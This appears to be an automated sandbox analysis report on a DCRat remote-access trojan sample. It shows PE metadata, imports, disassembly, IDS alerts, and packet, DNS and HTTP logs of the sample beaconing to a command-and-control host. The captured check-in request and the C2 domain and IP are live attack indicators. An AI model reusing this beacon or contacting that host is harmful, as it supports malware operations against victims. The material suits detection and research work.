            lea ecx, dword ptr [ebp-0Ch]
            call 00007FED3D16A54Eh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FED3D17A0D2h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007FED3D1777C4h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FED3D17A0B5h
            int3
            jmp 00007FED3D17C103h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x46968.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000x2268.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x630000x469680x46a0083942b3b08a4ead17ecb00803233bc5dFalse0.11983199668141593data1.7576868395608836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xaa0000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            PNG0x635240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
            PNG0x6406c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
            RT_ICON0x656180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m0.08164556025682752
            RT_DIALOG0xa76400x286dataEnglishUnited States0.5092879256965944
            RT_DIALOG0xa78c80x13adataEnglishUnited States0.60828025477707
            RT_DIALOG0xa7a040xecdataEnglishUnited States0.6991525423728814
            RT_DIALOG0xa7af00x12edataEnglishUnited States0.5927152317880795
            RT_DIALOG0xa7c200x338dataEnglishUnited States0.45145631067961167
            RT_DIALOG0xa7f580x252dataEnglishUnited States0.5757575757575758
            RT_STRING0xa81ac0x1e2dataEnglishUnited States0.3900414937759336
            RT_STRING0xa83900x1ccdataEnglishUnited States0.4282608695652174
            RT_STRING0xa855c0x1b8dataEnglishUnited States0.45681818181818185
            RT_STRING0xa87140x146dataEnglishUnited States0.5153374233128835
            RT_STRING0xa885c0x446dataEnglishUnited States0.340036563071298
            RT_STRING0xa8ca40x166dataEnglishUnited States0.49162011173184356
            RT_STRING0xa8e0c0x152dataEnglishUnited States0.5059171597633136
            RT_STRING0xa8f600x10adataEnglishUnited States0.49624060150375937
            RT_STRING0xa906c0xbcdataEnglishUnited States0.6329787234042553
            RT_STRING0xa91280xd6dataEnglishUnited States0.5747663551401869
            RT_GROUP_ICON0xa92000x14data1.1
            RT_MANIFEST0xa92140x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
            DLLImport
            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            05/24/24-11:07:09.472406TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M48049730141.8.192.26192.168.2.4
            05/24/24-11:08:12.793523TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M48049749141.8.192.26192.168.2.4
            TimestampSource PortDest PortSource IPDest IP
            May 24, 2024 11:07:08.119596004 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:08.124914885 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:08.125020027 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:08.125503063 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:08.177423954 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:08.907716036 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:08.912414074 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:08.912501097 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.140894890 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.141990900 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.150110006 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.199326038 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.199376106 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.200124025 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.200311899 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.211114883 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.472405910 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.634879112 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.894076109 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.899847984 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.899969101 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.906620979 CEST8049730141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.906685114 CEST4973080192.168.2.4141.8.192.26
            May 24, 2024 11:07:09.955445051 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:09.955482960 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:10.118223906 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:10.166050911 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.480415106 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.485656977 CEST8049731141.8.192.26192.168.2.4
            May 24, 2024 11:07:14.485723019 CEST4973180192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.489511013 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.552478075 CEST8049732141.8.192.26192.168.2.4
            May 24, 2024 11:07:14.552676916 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.552726984 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:14.557945967 CEST8049732141.8.192.26192.168.2.4
            May 24, 2024 11:07:14.607413054 CEST8049732141.8.192.26192.168.2.4
            May 24, 2024 11:07:15.258023024 CEST8049732141.8.192.26192.168.2.4
            May 24, 2024 11:07:15.306677103 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.277283907 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.277287006 CEST4973980192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.282746077 CEST8049732141.8.192.26192.168.2.4
            May 24, 2024 11:07:20.282881021 CEST4973280192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.287614107 CEST8049739141.8.192.26192.168.2.4
            May 24, 2024 11:07:20.288077116 CEST4973980192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.288510084 CEST4973980192.168.2.4141.8.192.26
            May 24, 2024 11:07:20.293598890 CEST8049739141.8.192.26192.168.2.4
            May 24, 2024 11:07:20.339272022 CEST8049739141.8.192.26192.168.2.4
            May 24, 2024 11:07:21.089430094 CEST8049739141.8.192.26192.168.2.4
            May 24, 2024 11:07:21.090197086 CEST4973980192.168.2.4141.8.192.26
            May 24, 2024 11:07:21.095792055 CEST8049739141.8.192.26192.168.2.4
            May 24, 2024 11:07:21.095850945 CEST4973980192.168.2.4141.8.192.26
            May 24, 2024 11:07:26.105052948 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:26.110063076 CEST8049740141.8.192.26192.168.2.4
            May 24, 2024 11:07:26.110198021 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:26.110286951 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:26.115190029 CEST8049740141.8.192.26192.168.2.4
            May 24, 2024 11:07:26.163312912 CEST8049740141.8.192.26192.168.2.4
            May 24, 2024 11:07:26.794965029 CEST8049740141.8.192.26192.168.2.4
            May 24, 2024 11:07:26.838027000 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.807475090 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.808784962 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.812814951 CEST8049740141.8.192.26192.168.2.4
            May 24, 2024 11:07:31.812860012 CEST4974080192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.817641020 CEST8049741141.8.192.26192.168.2.4
            May 24, 2024 11:07:31.817708969 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.817857027 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:31.822714090 CEST8049741141.8.192.26192.168.2.4
            May 24, 2024 11:07:31.871221066 CEST8049741141.8.192.26192.168.2.4
            May 24, 2024 11:07:32.531474113 CEST8049741141.8.192.26192.168.2.4
            May 24, 2024 11:07:32.587893963 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.541625977 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.542526960 CEST4974280192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.547148943 CEST8049741141.8.192.26192.168.2.4
            May 24, 2024 11:07:37.547321081 CEST4974180192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.554043055 CEST8049742141.8.192.26192.168.2.4
            May 24, 2024 11:07:37.554383993 CEST4974280192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.554546118 CEST4974280192.168.2.4141.8.192.26
            May 24, 2024 11:07:37.559493065 CEST8049742141.8.192.26192.168.2.4
            May 24, 2024 11:07:37.611313105 CEST8049742141.8.192.26192.168.2.4
            May 24, 2024 11:07:38.248681068 CEST8049742141.8.192.26192.168.2.4
            May 24, 2024 11:07:38.291030884 CEST4974280192.168.2.4141.8.192.26
            May 24, 2024 11:07:43.261418104 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:43.266767025 CEST8049743141.8.192.26192.168.2.4
            May 24, 2024 11:07:43.266855001 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:43.267050028 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:43.275945902 CEST8049743141.8.192.26192.168.2.4
            May 24, 2024 11:07:43.327967882 CEST8049743141.8.192.26192.168.2.4
            May 24, 2024 11:07:44.102874041 CEST8049743141.8.192.26192.168.2.4
            May 24, 2024 11:07:44.150392056 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.104279995 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.105093956 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.110399961 CEST8049743141.8.192.26192.168.2.4
            May 24, 2024 11:07:49.110496998 CEST4974380192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.115241051 CEST8049744141.8.192.26192.168.2.4
            May 24, 2024 11:07:49.115329981 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.115508080 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:49.120515108 CEST8049744141.8.192.26192.168.2.4
            May 24, 2024 11:07:49.171308041 CEST8049744141.8.192.26192.168.2.4
            May 24, 2024 11:07:49.818958044 CEST8049744141.8.192.26192.168.2.4
            May 24, 2024 11:07:49.869234085 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.822993040 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.824315071 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.829982042 CEST8049744141.8.192.26192.168.2.4
            May 24, 2024 11:07:54.830049038 CEST4974480192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.834846020 CEST8049745141.8.192.26192.168.2.4
            May 24, 2024 11:07:54.834914923 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.835216045 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:07:54.840605021 CEST8049745141.8.192.26192.168.2.4
            May 24, 2024 11:07:54.887295961 CEST8049745141.8.192.26192.168.2.4
            May 24, 2024 11:07:55.513802052 CEST8049745141.8.192.26192.168.2.4
            May 24, 2024 11:07:55.556760073 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.526547909 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.527956963 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.538017035 CEST8049745141.8.192.26192.168.2.4
            May 24, 2024 11:08:00.538104057 CEST4974580192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.542859077 CEST8049747141.8.192.26192.168.2.4
            May 24, 2024 11:08:00.542946100 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.543112993 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:00.548307896 CEST8049747141.8.192.26192.168.2.4
            May 24, 2024 11:08:00.599512100 CEST8049747141.8.192.26192.168.2.4
            May 24, 2024 11:08:01.238668919 CEST8049747141.8.192.26192.168.2.4
            May 24, 2024 11:08:01.292881012 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.245045900 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.246357918 CEST4974880192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.251701117 CEST8049747141.8.192.26192.168.2.4
            May 24, 2024 11:08:06.251801014 CEST4974780192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.257675886 CEST8049748141.8.192.26192.168.2.4
            May 24, 2024 11:08:06.257781029 CEST4974880192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.257934093 CEST4974880192.168.2.4141.8.192.26
            May 24, 2024 11:08:06.263983965 CEST8049748141.8.192.26192.168.2.4
            May 24, 2024 11:08:06.312273026 CEST8049748141.8.192.26192.168.2.4
            May 24, 2024 11:08:06.942858934 CEST8049748141.8.192.26192.168.2.4
            May 24, 2024 11:08:06.994179010 CEST4974880192.168.2.4141.8.192.26
            May 24, 2024 11:08:08.286454916 CEST8049742141.8.192.26192.168.2.4
            May 24, 2024 11:08:08.286644936 CEST4974280192.168.2.4141.8.192.26
            May 24, 2024 11:08:11.948689938 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:12.114819050 CEST8049749141.8.192.26192.168.2.4
            May 24, 2024 11:08:12.115185022 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:12.115185022 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:12.122534990 CEST8049749141.8.192.26192.168.2.4
            May 24, 2024 11:08:12.173036098 CEST8049749141.8.192.26192.168.2.4
            May 24, 2024 11:08:12.793523073 CEST8049749141.8.192.26192.168.2.4
            May 24, 2024 11:08:12.838093042 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.807725906 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.808289051 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.813745022 CEST8049749141.8.192.26192.168.2.4
            May 24, 2024 11:08:17.814799070 CEST4974980192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.818411112 CEST8049750141.8.192.26192.168.2.4
            May 24, 2024 11:08:17.818818092 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.818942070 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:17.823983908 CEST8049750141.8.192.26192.168.2.4
            May 24, 2024 11:08:17.875650883 CEST8049750141.8.192.26192.168.2.4
            May 24, 2024 11:08:18.619081974 CEST8049750141.8.192.26192.168.2.4
            May 24, 2024 11:08:18.665997982 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.635267973 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.636393070 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.640731096 CEST8049750141.8.192.26192.168.2.4
            May 24, 2024 11:08:23.640789032 CEST4975080192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.691778898 CEST8049751141.8.192.26192.168.2.4
            May 24, 2024 11:08:23.692781925 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.692904949 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:23.702884912 CEST8049751141.8.192.26192.168.2.4
            May 24, 2024 11:08:23.755714893 CEST8049751141.8.192.26192.168.2.4
            May 24, 2024 11:08:24.397114038 CEST8049751141.8.192.26192.168.2.4
            May 24, 2024 11:08:24.447257996 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.401130915 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.402393103 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.407566071 CEST8049751141.8.192.26192.168.2.4
            May 24, 2024 11:08:29.407661915 CEST4975180192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.412283897 CEST8049752141.8.192.26192.168.2.4
            May 24, 2024 11:08:29.412425995 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.412646055 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:29.417646885 CEST8049752141.8.192.26192.168.2.4
            May 24, 2024 11:08:29.467432976 CEST8049752141.8.192.26192.168.2.4
            May 24, 2024 11:08:30.136791945 CEST8049752141.8.192.26192.168.2.4
            May 24, 2024 11:08:30.181632996 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.428920031 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.429868937 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.434556007 CEST8049752141.8.192.26192.168.2.4
            May 24, 2024 11:08:35.434695959 CEST4975280192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.439203024 CEST8049753141.8.192.26192.168.2.4
            May 24, 2024 11:08:35.439284086 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.439461946 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:35.444859028 CEST8049753141.8.192.26192.168.2.4
            May 24, 2024 11:08:35.501300097 CEST8049753141.8.192.26192.168.2.4
            May 24, 2024 11:08:36.131242037 CEST8049753141.8.192.26192.168.2.4
            May 24, 2024 11:08:36.197318077 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:36.955503941 CEST8049748141.8.192.26192.168.2.4
            May 24, 2024 11:08:36.955650091 CEST4974880192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.293788910 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.293788910 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.300014973 CEST8049753141.8.192.26192.168.2.4
            May 24, 2024 11:08:42.300187111 CEST4975380192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.352083921 CEST8049754141.8.192.26192.168.2.4
            May 24, 2024 11:08:42.357044935 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.357044935 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:42.362235069 CEST8049754141.8.192.26192.168.2.4
            May 24, 2024 11:08:42.411375999 CEST8049754141.8.192.26192.168.2.4
            May 24, 2024 11:08:43.040803909 CEST8049754141.8.192.26192.168.2.4
            May 24, 2024 11:08:43.087869883 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.057905912 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.057905912 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.063257933 CEST8049755141.8.192.26192.168.2.4
            May 24, 2024 11:08:48.067573071 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.067573071 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.070586920 CEST8049754141.8.192.26192.168.2.4
            May 24, 2024 11:08:48.074728966 CEST4975480192.168.2.4141.8.192.26
            May 24, 2024 11:08:48.078594923 CEST8049755141.8.192.26192.168.2.4
            May 24, 2024 11:08:48.084745884 CEST8049755141.8.192.26192.168.2.4
            May 24, 2024 11:08:48.759102106 CEST8049755141.8.192.26192.168.2.4
            May 24, 2024 11:08:48.807233095 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.760354042 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.761580944 CEST4975680192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.766186953 CEST8049755141.8.192.26192.168.2.4
            May 24, 2024 11:08:53.766237974 CEST4975580192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.771387100 CEST8049756141.8.192.26192.168.2.4
            May 24, 2024 11:08:53.771461964 CEST4975680192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.771653891 CEST4975680192.168.2.4141.8.192.26
            May 24, 2024 11:08:53.777131081 CEST8049756141.8.192.26192.168.2.4
            May 24, 2024 11:08:53.823683977 CEST8049756141.8.192.26192.168.2.4
            May 24, 2024 11:08:54.474562883 CEST8049756141.8.192.26192.168.2.4
            May 24, 2024 11:08:54.526732922 CEST4975680192.168.2.4141.8.192.26
            May 24, 2024 11:08:59.480397940 CEST4975780192.168.2.4141.8.192.26
            May 24, 2024 11:08:59.485662937 CEST8049757141.8.192.26192.168.2.4
            May 24, 2024 11:08:59.485742092 CEST4975780192.168.2.4141.8.192.26
            May 24, 2024 11:08:59.485892057 CEST4975780192.168.2.4141.8.192.26
            May 24, 2024 11:08:59.490843058 CEST8049757141.8.192.26192.168.2.4
            May 24, 2024 11:08:59.546752930 CEST8049757141.8.192.26192.168.2.4
            May 24, 2024 11:09:00.170661926 CEST8049757141.8.192.26192.168.2.4
            May 24, 2024 11:09:00.214829922 CEST4975780192.168.2.4141.8.192.26
            TimestampSource PortDest PortSource IPDest IP
            May 24, 2024 11:07:07.929516077 CEST5141653192.168.2.41.1.1.1
            May 24, 2024 11:07:08.110831976 CEST53514161.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            May 24, 2024 11:07:07.929516077 CEST192.168.2.41.1.1.10x292fStandard query (0)a0985701.xsph.ruA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            May 24, 2024 11:07:08.110831976 CEST1.1.1.1192.168.2.40x292fNo error (0)a0985701.xsph.ru141.8.192.26A (IP address)IN (0x0001)false
            • a0985701.xsph.ru
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:08.125503063 CEST611OUTGET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:07:08.907716036 CEST1236INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:08 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 2160
            Connection: keep-alive
            Vary: Accept-Encoding
